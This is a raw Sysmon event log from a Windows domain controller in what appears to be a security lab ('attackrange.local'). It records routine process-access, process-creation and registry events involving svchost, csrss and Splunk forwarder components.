13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FE1-6005-0701-00000000A301}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FE1-6005-0701-00000000A301}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8FE1-6005-0701-00000000A301}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000004801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:41:07.536{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0x92f8c389) 10341000x80000000000000004814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9018-6005-0801-00000000A301}4664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9018-6005-0801-00000000A301}4664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9018-6005-0801-00000000A301}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.677{59A5CD1D-9018-6005-0801-00000000A301}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9019-6005-0A01-00000000A301}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
